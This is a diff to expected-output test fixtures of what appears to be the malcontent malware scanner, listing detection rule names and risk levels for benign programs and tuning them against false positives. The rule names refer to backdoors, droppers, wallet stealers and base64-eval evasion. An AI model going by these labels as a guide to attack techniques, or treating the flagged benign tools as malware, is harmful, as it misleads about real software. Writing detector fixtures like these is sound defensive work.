+ref/path/var/log: medium
+ref/program/sudo: medium
+ref/site/url: low
+ref/words/agent: medium
+ref/words/backdoor: high
+ref/words/dropper: medium
+ref/words/exploit: high
+ref/words/infected: medium
+ref/words/malicious: medium
+ref/words/obfuscate: low
+ref/words/password: low
+ref/words/plugin: low
+ref/words/rootkit: medium
+ref/words/spoof: medium
+ref/words/trojan: medium
+service/start: low
+shell/exec: medium
diff --git a/test_data/linux/clean/slirp4netns.simple b/test_data/linux/clean/slirp4netns.simple
index 90af261f..a8b711fb 100644
--- a/test_data/linux/clean/slirp4netns.simple
+++ b/test_data/linux/clean/slirp4netns.simple
@@ -1,5 +1,4 @@
 # linux/clean/slirp4netns: high
-combo/critical_paths: medium
 combo/net/scan_tool: medium
 env/GCONV_PATH: low
 env/HOME: low
@@ -12,6 +11,7 @@ env/TMPDIR: low
 env/USER: low
 exec/program: medium
 exec/program/background: low
+false_positives/slirp: low
 fd/epoll: low
 fs/attributes/set: medium
 fs/directory/create: low
@@ -41,7 +41,6 @@ kernel/acct: low
 kernel/hostname/set: low
 kernel/key/management: low
 kernel/module: medium
-kernel/module/load: medium
 kernel/netlink: low
 kernel/perfmon: low
 kernel/pivot_root: low
diff --git a/test_data/linux/clean/trivy.simple b/test_data/linux/clean/trivy.simple
index 9802228e..6c4fe445 100644
--- a/test_data/linux/clean/trivy.simple
+++ b/test_data/linux/clean/trivy.simple
@@ -14,7 +14,6 @@ cloud/google/metadata: low
 cloud/google/storage: low
 combo/backdoor/iptables: medium
 combo/backdoor/kill_rm: medium
-combo/critical_paths: medium
 combo/dropper/shell: high
 combo/net/host_port: medium
 combo/net/tunnel_proxy: medium
@@ -134,7 +133,7 @@ net/url/request: medium
 net/websocket: medium
 net/wireless: low
 process/chdir: low
-process/chdir/unusual: high
+process/chdir/unusual: medium
 process/chroot: low
 process/executable_path: low
 process/groupid/set: low
@@ -170,7 +169,6 @@ ref/site/github_api: low
 ref/site/github_raw: medium
 ref/site/http/dynamic: medium
 ref/site/url: low
-ref/words/backdoor: high
 ref/words/collection: medium
 ref/words/exclamation: medium
 ref/words/heartbeat: medium
diff --git a/test_data/linux/clean/trufflehog.md b/test_data/linux/clean/trufflehog.md
index 14f7f9b6..53ee92c0 100644
--- a/test_data/linux/clean/trufflehog.md
+++ b/test_data/linux/clean/trufflehog.md
@@ -23,7 +23,6 @@
 | MEDIUM | [3P/threat_hunting/userenum](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#UserEnum_offensive_tool_keyword) | [references 'UserEnum' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [userenum](https://github.com/search?q=userenum&type=code) |
 | MEDIUM | [archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) |
 | MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) |
-| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/cpuinfoDefaultMetriccollect_coun](https://github.com/search?q=%2Fproc%2FcpuinfoDefaultMetriccollect_coun&type=code)
[/proc/errno](https://github.com/search?q=%2Fproc%2Ferrno&type=code)
[/proc/seH](https://github.com/search?q=%2Fproc%2FseH&type=code)
[/proc/self/auxv](https://github.com/search?q=%2Fproc%2Fself%2Fauxv&type=code)
[/proc/self/cgroupcpu.cfs_period_uscont](https://github.com/search?q=%2Fproc%2Fself%2Fcgroupcpu.cfs_period_uscont&type=code)
[/proc/self/exeuserArenaStateGC](https://github.com/search?q=%2Fproc%2Fself%2FexeuserArenaStateGC&type=code)
[/proc/self/mapsjstmpllitinterptarinsec](https://github.com/search?q=%2Fproc%2Fself%2Fmapsjstmpllitinterptarinsec&type=code)
[/proc/self/mountinfomarketplace_purcha](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfomarketplace_purcha&type=code)
[/proc/sys/kernel/hostnamegoroutine](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostnamegoroutine&type=code)
[/proc/sys/net/core/somaxconn/usr/local](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2Fsomaxconn%2Fusr%2Flocal&type=code)
[/sys/class/dmi/id/product_nameNumber](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_nameNumber&type=code)
[/tmp/mysql.sockclientFoundRowsmultiSt](https://github.com/search?q=%2Ftmp%2Fmysql.sockclientFoundRowsmultiSt&type=code)
[/tmp/placeholder/](https://github.com/search?q=%2Ftmp%2Fplaceholder%2F&type=code)
[/usr/bin/envcomments_pop_1comments_pop_2](https://github.com/search?q=%2Fusr%2Fbin%2Fenvcomments_pop_1comments_pop_2&type=code)
[/usr/binH](https://github.com/search?q=%2Fusr%2FbinH&type=code)
[/var/run/slapd/ldapiTLS](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2FldapiTLS&type=code) |
 | MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"host"](https://github.com/search?q=json%3A%22host%22&type=code)
[json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) |
 | MEDIUM | [combo/net/scan_tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
 | MEDIUM | [compression/xz](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/xz.yara#xz_lib) | uses xz library | [ulikunitz/xz](https://github.com/search?q=ulikunitz%2Fxz&type=code) |
diff --git a/test_data/linux/clean/vitess/vtadmin.simple b/test_data/linux/clean/vitess/vtadmin.simple
index 312b7561..64b7ba54 100644
--- a/test_data/linux/clean/vitess/vtadmin.simple
+++ b/test_data/linux/clean/vitess/vtadmin.simple
@@ -8,7 +8,6 @@ archives/zip: medium
 cloud/google/metadata: low
 combo/backdoor/iptables: medium
 combo/backdoor/payload: high
-combo/critical_paths: medium
 combo/net/host_port: medium
 compression/bzip2: low
 compression/gzip: low
diff --git a/test_data/linux/clean/wikiticker-2015-09-12-sampled.json.simple b/test_data/linux/clean/wikiticker-2015-09-12-sampled.json.simple
new file mode 100644
index 00000000..3bcb62b7
--- /dev/null
+++ b/test_data/linux/clean/wikiticker-2015-09-12-sampled.json.simple
@@ -0,0 +1,23 @@
+# linux/clean/wikiticker-2015-09-12-sampled.json: high
+combo/stealer/wallet: medium
+crypto/aes: low
+crypto/fernet: medium
+evasion/blocklist/user: medium
+fs/file/delete/forcibly: low
+net/download: medium
+net/http/cookies: medium
+net/http/post: medium
+net/upload: medium
+ref/daemon: medium
+ref/ip: medium
+ref/ip_port: medium
+ref/path/relative: medium
+ref/program/minecraft: medium
+ref/site/php: medium
+ref/site/url: low
+ref/words/agent: medium
+ref/words/botnet: high
+ref/words/exclamation: medium
+ref/words/implant: medium
+ref/words/infected: medium
+ref/words/trojan: medium
diff --git a/test_data/linux/clean/wolfictl.simple b/test_data/linux/clean/wolfictl.simple
index ed8e1851..c66fdfcd 100644
--- a/test_data/linux/clean/wolfictl.simple
+++ b/test_data/linux/clean/wolfictl.simple
@@ -12,7 +12,6 @@ cloud/aws/metadata: low
 cloud/google/metadata: low
 cloud/google/storage: low
 combo/backdoor/kill_rm: medium
-combo/critical_paths: medium
 combo/dropper/shell: medium
 combo/net/raw_flooder: medium
 combo/net/scan_tool: medium
diff --git a/test_data/linux/synthetic/github-attach-fetch.sh.simple b/test_data/linux/synthetic/github-attach-fetch.sh.simple
index 8fda1438..72c50076 100644
--- a/test_data/linux/synthetic/github-attach-fetch.sh.simple
+++ b/test_data/linux/synthetic/github-attach-fetch.sh.simple
@@ -4,7 +4,7 @@ fs/permission/modify: medium
 net/fetch: medium
 ref/site/github_attachment: high
 ref/site/url: low
-ref/words/backdoor: high
+ref/words/backdoor: critical
 shell/background_launcher: high
 shell/exec: medium
 shell/nohup: medium
diff --git a/test_data/python/clean/google-cloud-sdk/mysql.py.simple b/test_data/python/clean/google-cloud-sdk/mysql.py.simple
new file mode 100644
index 00000000..a37914cc
--- /dev/null
+++ b/test_data/python/clean/google-cloud-sdk/mysql.py.simple
@@ -0,0 +1,13 @@
+# python/clean/google-cloud-sdk/mysql.py: high
+combo/degrader/infection: medium
+databases/mysql: medium
+evasion/fake/process: high
+fs/directory/create: low
+fs/file/copy: medium
+fs/file/open: low
+process/kill/multiple: medium
+ref/path/etc: low
+ref/path/etc/initd: medium
+ref/path/var: low
+ref/site/url: low
+ref/words/password: low
diff --git a/test_data/python/clean/versioneer/versioneer.py.simple b/test_data/python/clean/versioneer/versioneer.py.simple
new file mode 100644
index 00000000..d714e45a
--- /dev/null
+++ b/test_data/python/clean/versioneer/versioneer.py.simple
@@ -0,0 +1,9 @@
+# python/clean/versioneer/versioneer.py: medium
+data/embedded/base64/terms: medium
+data/embedded/base64/url: medium
+encoding/base64: low
+evasion/base64/decode: medium
+evasion/base64/eval: medium
+fd/write: low
+fs/file/open: low
+ref/path/usr/bin: low
diff --git a/test_data/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple b/test_data/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
new file mode 100644
index 00000000..b7afeb87
--- /dev/null
+++ b/test_data/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
@@ -0,0 +1,54 @@
+# windows/clean/Swashbuckle.AspNetCore.ReDoc.dll: medium
+combo/degrader/infection: medium
+compression/bzip2: low
+compression/gzip: low
+data/embedded/base64/url: medium
+data/embedded/html: medium
+encoding/base64: low
+encoding/json/decode: low
+encoding/json/encode: low
+env/HOME: low
+env/LANG: low
+env/SHELL: low
+env/TEMP: low
+env/TERM: low
+env/USER: low
+env/get: low
+exec/cmd: medium
+fd/write: low
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/file/write: low
+fs/mount: low
+fs/node/create: low
+fs/permission/modify: medium
+fs/quota/manipulate: low
+fs/swap/on: low
+fs/unmount: low
+kernel/platform: low
+net/download: medium
+net/hostname/resolve: low
+net/http/form/upload: medium
+net/http/post: medium
+net/http/request: low
+net/interface/list: medium
+net/oauth2: low
+net/sftp: medium
+net/ssh: medium
+net/stat: medium
+net/upload: medium
+net/url: low
+net/url/encode: medium
+persist/crontab: medium
+process/chroot: low
+process/username/get: medium
+ref/program/powershell: medium
+ref/program/sudo: medium
+ref/site/url: low
+ref/words/intercept: medium
+ref/words/password: low
+ref/words/plugin: low
+security_controls/linux/selinux: medium
+techniques/code_eval: medium
+time/clock/sleep: medium
diff --git a/test_data/windows/clean/make-win.ps1.simple b/test_data/windows/clean/make-win.ps1.simple
new file mode 100644
index 00000000..13bfb5ae
--- /dev/null
+++ b/test_data/windows/clean/make-win.ps1.simple
@@ -0,0 +1,7 @@
+# windows/clean/make-win.ps1: high
+3P/InQuest-VT/base64/powershell/directives: high
+3P/secuinfra/susp/powershell/base64: medium
+data/embedded/base64/terms: medium
+evasion/base64/decode: medium
+ref/site/url: low
+shell/pipe_sh: medium